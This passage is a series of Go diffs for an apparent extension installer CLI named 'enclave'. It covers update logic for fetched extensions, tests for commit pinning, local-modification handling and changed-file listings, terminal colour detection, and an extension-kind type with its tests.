+		// A sidecar written by an older or hand-edited install may not round
+		// trip through parseSource; the recorded remote is authoritative.
+		src = source{Raw: origin.Source, RemoteURL: origin.Remote, Subpath: origin.Subpath}
+	}
+	src.RemoteURL = origin.Remote
+	src.Subpath = origin.Subpath
+	src.Ref = origin.Ref
+	if req.Ref != "" {
+		src.Ref = req.Ref
+	}
+
+	// The installed tree is read once here, for this target only, and the
+	// manifest is carried into the plan for the changed-file list.
+	recorded := recordedTreeHash(origin)
+	installedTree, treeErr := readTreeManifest(installed)
+	if treeErr != nil && recorded != "" && !req.Force {
+		return ActionResult{}, treeErr
+	}
+	modified := recorded != "" && treeErr == nil && installedTree.Hash != recorded
+
+	// A commit pin is immutable: nothing to check unless the user asks for a
+	// different ref or forces a reinstall.
+	if origin.RefType == RefTypeCommit && req.Ref == "" && !req.Force {
+		if !modified {
+			_, _ = fmt.Fprintf(env.narrate(), "%s: pinned to %s, up to date\n", entry.Name, ShortCommit(origin.Commit))
+			return ActionResult{Name: entry.Name, Action: ActionUnchanged, Commit: origin.Commit, Path: installed}, nil
+		}
+		return ActionResult{}, fmt.Errorf("pinned to %s and has local modifications; pass --force to reinstall it", ShortCommit(origin.Commit))
+	}
+
+	resolved, err := fetched.resolve(ctx, src.RemoteURL, src.Ref)
+	if err != nil {
+		return ActionResult{}, err
+	}
+	if resolved.Commit == origin.Commit && !modified && !req.Force {
+		_, _ = fmt.Fprintf(env.narrate(), "%s: up to date at %s\n", entry.Name, ShortCommit(origin.Commit))
+		return ActionResult{Name: entry.Name, Action: ActionUnchanged, Commit: origin.Commit, Path: installed}, nil
+	}
+	if modified && !req.Force {
+		return ActionResult{}, fmt.Errorf("has local modifications; pass --force to discard them")
+	}
+
+	// The reference is already resolved, so this fetch needs no round trip.
+	repo, err := fetched.open(ctx, src.RemoteURL, resolved)
+	if err != nil {
+		return ActionResult{}, err
+	}
+
+	candidates, err := candidateDirs(repo.Files(), origin.Subpath)
+	if err != nil {
+		return ActionResult{}, fmt.Errorf("%s no longer provides it: %w", src.Display(), err)
+	}
+	if err := materializeCandidates(ctx, repo, candidates); err != nil {
+		return ActionResult{}, err
+	}
+	match, _, skipped := selectKind(classify(repo.Dir(), candidates), req.Kind)
+	if len(match) == 0 {
+		reason := "no matching extension"
+		if len(skipped) > 0 {
+			reason = skipped[0].Skip
+		}
+		return ActionResult{}, fmt.Errorf("%s: %s", src.Display(), reason)
+	}
+	var selected *classified
+	for i := range match {
+		if match[i].Name == entry.Name {
+			selected = &match[i]
+			break
+		}
+	}
+	if selected == nil {
+		return ActionResult{}, fmt.Errorf("%s no longer provides this %s", src.Display(), req.Kind.Label())
+	}
+
+	before, inspectErr := inspect(installed, req.Kind)
+	plan := planFromRepo(src, repo, *selected, ActionUpdated)
+	if inspectErr == nil {
+		plan.Before = &before
+	}
+	if treeErr == nil {
+		plan.BeforeTree = &installedTree
+	}
+	return applyPlan(env, req, plan, stage)
+}

--- a/internal/extinstall/update.go
+++ b/internal/extinstall/update.go
@@ -65,7 +65,7 @@ func Update(ctx context.Context, env Env, req Request) ([]ActionResult, error) {
 		}
 		results = append(results, result)
 	}
-	env.summarize(env.Style, req.Kind.Label(), results, req.DryRun)
+	env.summarize(req.Kind.Label(), results, req.DryRun)
 	return results, nil
 }
 

--- a/internal/extinstall/update.go
+++ b/internal/extinstall/update.go
@@ -65,6 +65,7 @@ func Update(ctx context.Context, env Env, req Request) ([]ActionResult, error) {
 		}
 		results = append(results, result)
 	}
+	env.summarize(env.Style, req.Kind.Label(), results, req.DryRun)
 	return results, nil
 }
 
@@ -121,7 +122,7 @@ func updateOne(ctx context.Context, env Env, req Request, stage *staging, fetche
 	// different ref or forces a reinstall.
 	if origin.RefType == RefTypeCommit && req.Ref == "" && !req.Force {
 		if !modified {
-			_, _ = fmt.Fprintf(env.narrate(), "%s: pinned to %s, up to date\n", entry.Name, ShortCommit(origin.Commit))
+			env.unchanged(entry.Name, "pinned to %s, up to date", ShortCommit(origin.Commit))
 			return ActionResult{Name: entry.Name, Action: ActionUnchanged, Commit: origin.Commit, Path: installed}, nil
 		}
 		return ActionResult{}, fmt.Errorf("pinned to %s and has local modifications; pass --force to reinstall it", ShortCommit(origin.Commit))
@@ -132,7 +133,7 @@ func updateOne(ctx context.Context, env Env, req Request, stage *staging, fetche
 		return ActionResult{}, err
 	}
 	if resolved.Commit == origin.Commit && !modified && !req.Force {
-		_, _ = fmt.Fprintf(env.narrate(), "%s: up to date at %s\n", entry.Name, ShortCommit(origin.Commit))
+		env.unchanged(entry.Name, "up to date at %s", ShortCommit(origin.Commit))
 		return ActionResult{Name: entry.Name, Action: ActionUnchanged, Commit: origin.Commit, Path: installed}, nil
 	}
 	if modified && !req.Force {

--- a/internal/extinstall/update_test.go
+++ b/internal/extinstall/update_test.go
@@ -189,8 +189,10 @@ func TestUpdateShowsChangedFileList(t *testing.T) {
 	if len(results) != 1 || results[0].Action != ActionUpdated {
 		t.Fatalf("results = %s", fmtResults(results))
 	}
+	// The status is padded into a column, so the assertions match on the
+	// status and its path rather than on the run of spaces between them.
 	rendered := out.String()
-	for _, want := range []string{"file(s) changed", "modified install.sh", "added new.txt", "removed old.txt"} {
+	for _, want := range []string{"file(s) changed", "modified install.sh", "added    new.txt", "removed  old.txt"} {
 		if !strings.Contains(rendered, want) {
 			t.Errorf("changed-file list missing %q:\n%s", want, rendered)
 		}

--- a/internal/extinstall/update_test.go
+++ b/internal/extinstall/update_test.go
@@ -1,0 +1,446 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package extinstall
+
+import (
+	"context"
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"enclave/internal/model"
+)
+
+// installFoo puts a managed "foo" feature in place by running Add, so update
+// tests start from exactly what a real install produces.
+func installFoo(t *testing.T, env Env) {
+	t.Helper()
+	if _, err := Add(context.Background(), env, addRequest()); err != nil {
+		t.Fatalf("seed install: %v", err)
+	}
+}
+
+func updateRequest(names ...string) Request {
+	return Request{Kind: model.KindFeature, Op: OpUpdate, Names: names, Yes: true}
+}
+
+func TestUpdateSkipsWhenCommitUnchanged(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	installFoo(t, env)
+
+	opensBefore := fetcher.opens
+	results, err := Update(context.Background(), env, updateRequest())
+	if err != nil {
+		t.Fatalf("Update: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionUnchanged {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+	if fetcher.opens != opensBefore {
+		t.Fatalf("Update fetched the repository despite an unchanged commit (opens %d -> %d)", opensBefore, fetcher.opens)
+	}
+}
+
+func TestUpdateAppliesNewCommit(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	installFoo(t, env)
+
+	// Advance the fake remote: new commit, new content.
+	updated := fooRepoFiles()
+	updated["extensions/features/foo/spec.yaml"] = fooFeatureSpec + "aptPackages:\n  - jq\n"
+	next := newFakeFetcher(t, "b2c3d4e5", updated)
+	env.Fetcher = next
+
+	results, err := Update(context.Background(), env, updateRequest())
+	if err != nil {
+		t.Fatalf("Update: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionUpdated {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+	installed := filepath.Join(env.Paths.UserFeaturesDir, "foo")
+	origin, err := readOrigin(installed)
+	if err != nil || origin == nil {
+		t.Fatalf("readOrigin: %v, %v", origin, err)
+	}
+	if origin.Commit != "b2c3d4e5" {
+		t.Fatalf("origin commit = %q, want the new commit", origin.Commit)
+	}
+	// An update stamps the tree hash it computed while diffing the staged tree
+	// rather than reading the installed directory a second time, so that hash
+	// must still describe what the swap put on disk.
+	modified, err := isLocallyModified(installed, *origin)
+	if err != nil {
+		t.Fatalf("isLocallyModified: %v", err)
+	}
+	if modified {
+		t.Fatal("a freshly updated extension reports local modifications")
+	}
+	content, err := os.ReadFile(filepath.Join(installed, "spec.yaml"))
+	if err != nil {
+		t.Fatalf("read spec: %v", err)
+	}
+	if !strings.Contains(string(content), "jq") {
+		t.Fatal("updated content was not installed")
+	}
+}
+
+// TestUpdateUnchangedContentReportsNoCapabilityDiff: the installed ("before")
+// directory carries a provenance sidecar that the staged ("after") tree never
+// has, so file/byte counts must exclude it or every update reports a diff of
+// exactly the sidecar's size. A new commit whose content is byte-identical
+// must report an empty diff.
+func TestUpdateUnchangedContentReportsNoCapabilityDiff(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	installFoo(t, env)
+
+	// Advance the fake remote to a new commit with byte-identical content, so
+	// the update proceeds (new commit) but nothing about the extension itself
+	// changed.
+	next := newFakeFetcher(t, "b2c3d4e5", fooRepoFiles())
+	env.Fetcher = next
+	out := &bytesBuffer{}
+	env.Narration = out
+
+	results, err := Update(context.Background(), env, updateRequest())
+	if err != nil {
+		t.Fatalf("Update: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionUpdated {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+	if !strings.Contains(out.String(), "no capability changes") {
+		t.Fatalf("update with byte-identical content did not report an empty capability diff:\n%s", out.String())
+	}
+}
+
+// TestUpdateRebuildHintTracksContent: the image identity hash is content-based
+// and excludes the provenance sidecar, so re-pinning to a new commit whose
+// content is byte-identical cannot move it and no rebuild follows. Promising
+// one either way would be a claim the build never honours.
+func TestUpdateRebuildHintTracksContent(t *testing.T) {
+	const rebuildHint = "rebuilds the image"
+	for _, tc := range []struct {
+		name        string
+		spec        string
+		wantRebuild bool
+	}{
+		{"identical content", fooFeatureSpec, false},
+		{"changed content", fooFeatureSpec + "aptPackages:\n  - jq\n", true},
+	} {
+		t.Run(tc.name, func(t *testing.T) {
+			env, _ := testEnv(t, newFakeFetcher(t, "a1b2c3d4", fooRepoFiles()), "")
+			installFoo(t, env)
+
+			next := fooRepoFiles()
+			next["extensions/features/foo/spec.yaml"] = tc.spec
+			env.Fetcher = newFakeFetcher(t, "b2c3d4e5", next)
+			out := &bytesBuffer{}
+			env.Narration = out
+
+			results, err := Update(context.Background(), env, updateRequest())
+			if err != nil {
+				t.Fatalf("Update: %v", err)
+			}
+			if len(results) != 1 || results[0].Action != ActionUpdated {
+				t.Fatalf("results = %s", fmtResults(results))
+			}
+			if got := strings.Contains(out.String(), rebuildHint); got != tc.wantRebuild {
+				t.Fatalf("promised a rebuild = %v, want %v:\n%s", got, tc.wantRebuild, out.String())
+			}
+		})
+	}
+}
+
+// TestUpdateShowsChangedFileList: an update must show the changed-file list
+// and the capability diff, not the capability diff alone. A new commit that
+// adds a file, removes a file, and modifies a third must list all three with
+// their status.
+func TestUpdateShowsChangedFileList(t *testing.T) {
+	original := fooRepoFiles()
+	original["extensions/features/foo/old.txt"] = "will be removed\n"
+	fetcher := newFakeFetcher(t, "a1b2c3d4", original)
+	env, _ := testEnv(t, fetcher, "")
+	installFoo(t, env)
+
+	updated := map[string]string{
+		"extensions/features/foo/spec.yaml":  fooFeatureSpec,              // unchanged
+		"extensions/features/foo/install.sh": "#!/bin/sh\necho updated\n", // modified
+		"extensions/features/foo/new.txt":    "added\n",                   // added
+		// old.txt dropped: removed
+	}
+	out := &bytesBuffer{}
+	env.Fetcher = newFakeFetcher(t, "b2c3d4e5", updated)
+	env.Narration = out
+
+	results, err := Update(context.Background(), env, updateRequest())
+	if err != nil {
+		t.Fatalf("Update: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionUpdated {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+	rendered := out.String()
+	for _, want := range []string{"file(s) changed", "modified install.sh", "added new.txt", "removed old.txt"} {
+		if !strings.Contains(rendered, want) {
+			t.Errorf("changed-file list missing %q:\n%s", want, rendered)
+		}
+	}
+}
+
+func TestUpdateRefusesLocalModifications(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	installFoo(t, env)
+
+	installed := filepath.Join(env.Paths.UserFeaturesDir, "foo")
+	writeFixture(t, filepath.Join(installed, "local.sh"), "echo mine\n", 0o644)
+
+	results, err := Update(context.Background(), env, updateRequest())
+	if err == nil && !HasFailure(results) {
+		t.Fatalf("Update clobbered local edits: %s", fmtResults(results))
+	}
+	if _, statErr := os.Stat(filepath.Join(installed, "local.sh")); statErr != nil {
+		t.Fatalf("local edit was destroyed: %v", statErr)
+	}
+
+	forced := updateRequest()
+	forced.Force = true
+	results, err = Update(context.Background(), env, forced)
+	if err != nil {
+		t.Fatalf("Update --force: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionUpdated {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+	if _, statErr := os.Stat(filepath.Join(installed, "local.sh")); !os.IsNotExist(statErr) {
+		t.Fatal("--force did not discard the local edit")
+	}
+}
+
+func TestUpdatePinnedCommitNeedsNoNetwork(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0", fooRepoFiles())
+	fetcher.repo.refType = RefTypeCommit
+	fetcher.repo.ref = fetcher.repo.commit
+	env, _ := testEnv(t, fetcher, "")
+	installFoo(t, env)
+
+	resolvesBefore, opensBefore := fetcher.resolves, fetcher.opens
+	results, err := Update(context.Background(), env, updateRequest())
+	if err != nil {
+		t.Fatalf("Update: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionUnchanged {
+		t.Fatalf("results = %s", fmtResults(results))
+	}
+	if fetcher.resolves != resolvesBefore || fetcher.opens != opensBefore {
+		t.Fatalf("pinned update touched the network (resolves %d->%d, opens %d->%d)",
+			resolvesBefore, fetcher.resolves, opensBefore, fetcher.opens)
+	}
+}
+
+// TestUpdateForcedIgnoresUnreadableInstalledContent pins that --force replaces
+// content it cannot hash: it discards local edits whatever they are, so the
+// unreadable dangling symlink below must not turn into a failed update.
+func TestUpdateForcedIgnoresUnreadableInstalledContent(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	installFoo(t, env)
+
+	installed := filepath.Join(env.Paths.UserFeaturesDir, "foo")
+	if err := os.Symlink(filepath.Join(installed, "gone"), filepath.Join(installed, "dangling")); err != nil {
+		t.Fatalf("Symlink: %v", err)
+	}
+
+	req := updateRequest()
+	req.Force = true
+	results, err := Update(context.Background(), env, req)
+	if err != nil {
+		t.Fatalf("Update --force: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionUpdated {
+		t.Fatalf("results = %s, want a forced update", fmtResults(results))
+	}
+	if _, statErr := os.Lstat(filepath.Join(installed, "dangling")); !os.IsNotExist(statErr) {
+		t.Fatal("--force did not replace the installed tree")
+	}
+}
+
+// TestUpdateFetchesEachRemoteRefOnce covers the common "one kit repository,
+// several extensions" layout: every target of a bare update comes from the
+// same remote at the same ref, so the whole run costs one reference resolution
+// and one fetch, not one of each per extension.
+func TestUpdateFetchesEachRemoteRefOnce(t *testing.T) {
+	kit := func(marker string) map[string]string {
+		files := map[string]string{}
+		for _, name := range []string{"alpha", "beta", "gamma"} {
+			dir := "extensions/features/" + name
+			files[dir+"/spec.yaml"] = "schemaVersion: \"1\"\nkind: mixin\nname: " + name + "\n"
+			files[dir+"/install.sh"] = "#!/bin/sh\necho " + marker + "\n"
+		}
+		return files
+	}
+	env, _ := testEnv(t, newFakeFetcher(t, "a1b2c3d4", kit("first")), "")
+	seed := addRequest()
+	seed.All = true
+	if _, err := Add(context.Background(), env, seed); err != nil {
+		t.Fatalf("seed install: %v", err)
+	}
+
+	next := newFakeFetcher(t, "b2c3d4e5", kit("second"))
+	env.Fetcher = next
+
+	results, err := Update(context.Background(), env, updateRequest())
+	if err != nil {
+		t.Fatalf("Update: %v", err)
+	}
+	if len(results) != 3 {
+		t.Fatalf("results = %s, want all three extensions updated", fmtResults(results))
+	}
+	for _, result := range results {
+		if result.Action != ActionUpdated {
+			t.Fatalf("results = %s, want all three extensions updated", fmtResults(results))
+		}
+	}
+	if next.resolves != 1 {
+		t.Errorf("resolves = %d, want the shared remote ref resolved once", next.resolves)
+	}
+	if next.opens != 1 {
+		t.Errorf("opens = %d, want the shared remote ref fetched once", next.opens)
+	}
+}
+
+func TestUpdateSkipsUnmanagedExtensions(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	writeFixture(t, filepath.Join(env.Paths.UserFeaturesDir, "handmade", "spec.yaml"),
+		"schemaVersion: \"1\"\nkind: mixin\nname: handmade\n", 0o644)
+
+	results, err := Update(context.Background(), env, updateRequest())
+	if err != nil {
+		t.Fatalf("Update: %v", err)
+	}
+	if len(results) != 1 || results[0].Name != "handmade" || results[0].Action != ActionSkipped {
+		t.Fatalf("results = %s, want handmade reported as skipped", fmtResults(results))
+	}
+	assertResultsDoNotNameExtensions(t, results)
+}
+
+func TestUpdateSkipsCorruptSidecar(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	broken := filepath.Join(env.Paths.UserFeaturesDir, "broken")
+	writeFixture(t, filepath.Join(broken, "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: broken\n", 0o644)
+	writeFixture(t, filepath.Join(broken, model.ExtensionSourceFilename), "{not valid json", 0o644)
+
+	results, err := Update(context.Background(), env, updateRequest())
+	if err != nil {
+		t.Fatalf("Update: %v", err)
+	}
+	if len(results) != 1 || results[0].Name != "broken" || results[0].Action != ActionSkipped {
+		t.Fatalf("results = %s, want broken reported as skipped", fmtResults(results))
+	}
+	if !strings.Contains(results[0].Error, "provenance file could not be read") {
+		t.Fatalf("Error = %q, want it to distinguish an unreadable sidecar from a genuinely unmanaged extension", results[0].Error)
+	}
+	if strings.Contains(results[0].Error, "not installed by enclave") {
+		t.Fatalf("Error = %q, a corrupt sidecar is not the same as never having been installed", results[0].Error)
+	}
+	assertResultsDoNotNameExtensions(t, results)
+}
+
+func TestUpdateRefRejectedForMultipleTargets(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	installFoo(t, env)
+	// Seed a second managed extension so the --ref check, not the
+	// unknown-name check, is what this test exercises.
+	barDir := filepath.Join(env.Paths.UserFeaturesDir, "bar")
+	writeFixture(t, filepath.Join(barDir, "spec.yaml"), "schemaVersion: \"1\"\nkind: mixin\nname: bar\n", 0o644)
+	if err := WriteOrigin(barDir, Origin{
+		SchemaVersion: OriginSchemaVersion,
+		Kind:          string(model.KindFeature),
+		Name:          "bar",
+		Remote:        "https://github.com/acme/bar",
+		Source:        "acme/bar",
+		Ref:           "main",
+		RefType:       RefTypeBranch,
+		Commit:        "c3d4e5f6",
+		InstalledAt:   "2026-08-01T00:00:00Z",
+		InstalledBy:   "enclave test",
+	}); err != nil {
+		t.Fatalf("seed bar origin: %v", err)
+	}
+
+	req := updateRequest("foo", "bar")
+	req.Ref = "v2"
+	if _, err := Update(context.Background(), env, req); err == nil {
+		t.Fatal("--ref with several targets was accepted")
+	}
+}
+
+// TestUpdateFailsExplicitlyWhenSourceNoLongerProvidesTheName: when none of
+// the fetched candidates matches the installed name, updateOne must fail
+// rather than update a different extension from the same source.
+//
+// "foo" is installed from a repository-root spec (Subpath ""), so update's
+// candidateDirs call re-scans the whole repository rather than one fixed
+// path; the remote is then advanced to a tree that still has one matching
+// mixin, just declared under a different name and directory ("renamed", not
+// "foo").
+func TestUpdateFailsExplicitlyWhenSourceNoLongerProvidesTheName(t *testing.T) {
+	rootFoo := map[string]string{
+		"spec.yaml":  "schemaVersion: \"1\"\nkind: mixin\nname: foo\n",
+		"install.sh": "#!/bin/sh\necho foo\n",
+	}
+	fetcher := newFakeFetcher(t, "a1b2c3d4", rootFoo)
+	env, _ := testEnv(t, fetcher, "")
+	if _, err := Add(context.Background(), env, addRequest()); err != nil {
+		t.Fatalf("seed install: %v", err)
+	}
+	if origin, err := readOrigin(filepath.Join(env.Paths.UserFeaturesDir, "foo")); err != nil || origin == nil || origin.Subpath != "" {
+		t.Fatalf("precondition: expected a root-installed foo with empty Subpath, got %+v, %v", origin, err)
+	}
+
+	renamed := map[string]string{
+		"extensions/features/renamed/spec.yaml":  "schemaVersion: \"1\"\nkind: mixin\nname: renamed\n",
+		"extensions/features/renamed/install.sh": "#!/bin/sh\necho renamed\n",
+	}
+	env.Fetcher = newFakeFetcher(t, "b2c3d4e5", renamed)
+
+	results, err := Update(context.Background(), env, updateRequest())
+	if err != nil {
+		t.Fatalf("Update: %v", err)
+	}
+	if len(results) != 1 || results[0].Action != ActionFailed {
+		t.Fatalf("results = %s, want an explicit failure", fmtResults(results))
+	}
+	if results[0].Name != "foo" {
+		t.Fatalf("results = %s, want the failure attributed to foo", fmtResults(results))
+	}
+	assertResultsDoNotNameExtensions(t, results)
+	// The installed "foo" must be untouched, not silently replaced by "renamed".
+	if _, statErr := os.Stat(filepath.Join(env.Paths.UserFeaturesDir, "foo", "spec.yaml")); statErr != nil {
+		t.Fatalf("installed extension was touched by the failed update: %v", statErr)
+	}
+	if _, statErr := os.Stat(filepath.Join(env.Paths.UserFeaturesDir, "renamed")); !os.IsNotExist(statErr) {
+		t.Fatal("update silently installed the wrong extension under the old name")
+	}
+}
+
+func TestUpdateUnknownName(t *testing.T) {
+	fetcher := newFakeFetcher(t, "a1b2c3d4", fooRepoFiles())
+	env, _ := testEnv(t, fetcher, "")
+	if _, err := Update(context.Background(), env, updateRequest("missing")); err == nil {
+		t.Fatal("Update accepted an unknown name")
+	}
+}

--- a/internal/logx/color.go
+++ b/internal/logx/color.go
@@ -25,9 +25,29 @@ const (
 	ColorGreen  Color = "\x1b[32m"
 	ColorCyan   Color = "\x1b[36m"
 	ColorDim    Color = "\x1b[2m"
+	ColorBold   Color = "\x1b[1m"
 )
 
-var colorEnabled = resolveColorEnabled()
+var colorEnabled = ColorEnabledFor(os.Stderr)
+
+// ColorEnabledFor reports whether ANSI styling should be written to f, for
+// callers that render to a stream other than the log stream. NO_COLOR wins
+// outright, then ENCLAVE_COLOR, and otherwise f has to be a terminal.
+func ColorEnabledFor(f *os.File) bool {
+	if os.Getenv("NO_COLOR") != "" {
+		return false
+	}
+	switch strings.ToLower(strings.TrimSpace(os.Getenv(model.EnvColor))) {
+	case "always":
+		return true
+	case "never":
+		return false
+	}
+	if f == nil {
+		return false
+	}
+	return term.IsTerminal(int(f.Fd())) // #nosec G115 -- file descriptor from Fd() fits in int on all supported platforms.
+}
 
 func Colorize(text string, color Color) string {
 	if !colorEnabled || color == "" {
@@ -38,21 +58,4 @@ func Colorize(text string, color Color) string {
 
 func colorPrefix(label string, color Color) string {
 	return Colorize(label+": ", color)
-}
-
-func resolveColorEnabled() bool {
-	if os.Getenv("NO_COLOR") != "" {
-		return false
-	}
-
-	switch strings.ToLower(strings.TrimSpace(os.Getenv(model.EnvColor))) {
-	case "always":
-		return true
-	case "never":
-		return false
-	case "", "auto":
-		fallthrough
-	default:
-		return term.IsTerminal(int(os.Stderr.Fd())) // #nosec G115 -- file descriptor from Fd() fits in int on all supported platforms.
-	}
 }

--- a/internal/model/extension_kind.go
+++ b/internal/model/extension_kind.go
@@ -1,0 +1,62 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package model
+
+// ExtensionKind distinguishes the two extension flavours as the CLI presents
+// them. The on-disk spec spells the same distinction `kind: sandbox|mixin`;
+// SpecKind maps a kind to that token.
+type ExtensionKind string
+
+const (
+	KindTool    ExtensionKind = "tool"
+	KindFeature ExtensionKind = "feature"
+)
+
+// SpecKind is the `kind` token an extension of this kind declares in its spec
+// document, and the Extension.Type it loads as.
+func (k ExtensionKind) SpecKind() string {
+	if k == KindTool {
+		return ExtensionKindSandbox
+	}
+	return ExtensionKindMixin
+}
+
+// ExtensionKindFor maps an on-disk spec kind token back to the kind it names.
+// An unrecognized token names no kind.
+func ExtensionKindFor(specKind string) (ExtensionKind, bool) {
+	switch specKind {
+	case ExtensionKindSandbox:
+		return KindTool, true
+	case ExtensionKindMixin:
+		return KindFeature, true
+	default:
+		return "", false
+	}
+}
+
+// DirName is the subdirectory of an extension root holding this kind.
+func (k ExtensionKind) DirName() string {
+	if k == KindTool {
+		return "tools"
+	}
+	return "features"
+}
+
+// Verb is the CLI parent command for this kind.
+func (k ExtensionKind) Verb() string { return k.DirName() }
+
+// Label is the singular noun used in messages.
+func (k ExtensionKind) Label() string { return string(k) }
+
+// Other is the opposite kind.
+func (k ExtensionKind) Other() ExtensionKind {
+	if k == KindTool {
+		return KindFeature
+	}
+	return KindTool
+}

--- a/internal/model/extension_kind.go
+++ b/internal/model/extension_kind.go
@@ -39,16 +39,14 @@ func ExtensionKindFor(specKind string) (ExtensionKind, bool) {
 	}
 }
 
-// DirName is the subdirectory of an extension root holding this kind.
+// DirName is the plural name of this kind: the subdirectory of an extension
+// root holding it, and the CLI parent command that manages it.
 func (k ExtensionKind) DirName() string {
 	if k == KindTool {
 		return "tools"
 	}
 	return "features"
 }
-
-// Verb is the CLI parent command for this kind.
-func (k ExtensionKind) Verb() string { return k.DirName() }
 
 // Label is the singular noun used in messages.
 func (k ExtensionKind) Label() string { return string(k) }

--- a/internal/model/extension_kind_test.go
+++ b/internal/model/extension_kind_test.go
@@ -16,9 +16,6 @@ func TestExtensionKindMappings(t *testing.T) {
 	if KindFeature.DirName() != "features" || KindTool.DirName() != "tools" {
 		t.Fatal("dir names wrong")
 	}
-	if KindFeature.Verb() != "features" || KindTool.Verb() != "tools" {
-		t.Fatal("verbs wrong")
-	}
 	if KindFeature.Label() != "feature" || KindTool.Label() != "tool" {
 		t.Fatal("labels wrong")
 	}

--- a/internal/model/extension_kind_test.go
+++ b/internal/model/extension_kind_test.go
@@ -1,0 +1,28 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package model
+
+import "testing"
+
+func TestExtensionKindMappings(t *testing.T) {
+	if KindFeature.SpecKind() != ExtensionKindMixin || KindTool.SpecKind() != ExtensionKindSandbox {
+		t.Fatalf("spec kinds wrong: %q %q", KindFeature.SpecKind(), KindTool.SpecKind())
+	}
+	if KindFeature.DirName() != "features" || KindTool.DirName() != "tools" {
+		t.Fatal("dir names wrong")
+	}
+	if KindFeature.Verb() != "features" || KindTool.Verb() != "tools" {
+		t.Fatal("verbs wrong")
+	}
+	if KindFeature.Label() != "feature" || KindTool.Label() != "tool" {
+		t.Fatal("labels wrong")
+	}
+	if KindFeature.Other() != KindTool || KindTool.Other() != KindFeature {
+		t.Fatal("Other() wrong")
+	}
+}

--- a/internal/model/extension_layout_test.go
+++ b/internal/model/extension_layout_test.go
@@ -1,0 +1,84 @@
+// Copyright (C) 2026 EclipseSource GmbH and others.
+//
+// This program and the accompanying materials are made available under the
+// terms of the MIT License, which is available in the project root.
+//
+// SPDX-License-Identifier: MIT
+
+package model
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"regexp"
+	"strings"
+	"testing"
+)
+
+func readRepoFile(t *testing.T, rel string) string {
+	t.Helper()
+	data, err := os.ReadFile(filepath.Join("..", "..", rel))
+	if err != nil {
+		t.Fatalf("read %s: %v", rel, err)
+	}
+	return string(data)
+}
+
+// TestExtensionLayoutMatchesShell pins the extension layout constants to the
+// shell that actually consumes the directories. A rename on either side is a
+// silent capability-summary gap otherwise: the scanner in internal/extinstall
+// would stop recognizing a directory the container still runs.
+func TestExtensionLayoutMatchesShell(t *testing.T) {
+	entrypoint := readRepoFile(t, "entrypoint.sh")
+	kitInit := readRepoFile(t, "runtime-assets/kit-init.sh")
+
+	for _, want := range []struct {
+		name    string
+		needle  string
+		sources map[string]string
+	}{
+		{"ToolEntrypointDir", "/" + ToolEntrypointDir, map[string]string{"entrypoint.sh": entrypoint}},
+		{"FeatureEntrypointDir", FeatureEntrypointDir, map[string]string{"entrypoint.sh": entrypoint}},
+		{
+			"ExtensionFilesWorkspaceDir",
+			ExtensionFilesDir + "/" + ExtensionFilesWorkspaceDir,
+			map[string]string{"runtime-assets/kit-init.sh": kitInit},
+		},
+	} {
+		for source, content := range want.sources {
+			if !strings.Contains(content, want.needle) {
+				t.Errorf("%s = %q, but %s does not mention %q", want.name, want.needle, source, want.needle)
+			}
+		}
+	}
+}
+
+// TestKitInitSubstitutedVarsMatchesShell pins the envsubst whitelist to the one
+// kit-init.sh passes. writesIntoProject reasons about which variables expand, so
+// a whitelist change that is not mirrored here makes the capability summary
+// claim the wrong destination for an initFiles path.
+func TestKitInitSubstitutedVarsMatchesShell(t *testing.T) {
+	kitInit := readRepoFile(t, "runtime-assets/kit-init.sh")
+
+	// The single-quoted shell-format argument is the whitelist; kit-init.sh
+	// passes the same one at every call site.
+	pattern := regexp.MustCompile(`envsubst '([^']*)'`)
+	matches := pattern.FindAllStringSubmatch(kitInit, -1)
+	if len(matches) == 0 {
+		t.Fatal("no envsubst whitelist found in runtime-assets/kit-init.sh")
+	}
+
+	var want []string
+	for _, v := range KitInitSubstitutedVars {
+		want = append(want, fmt.Sprintf("${%s}", v))
+	}
+	expected := strings.Join(want, " ")
+
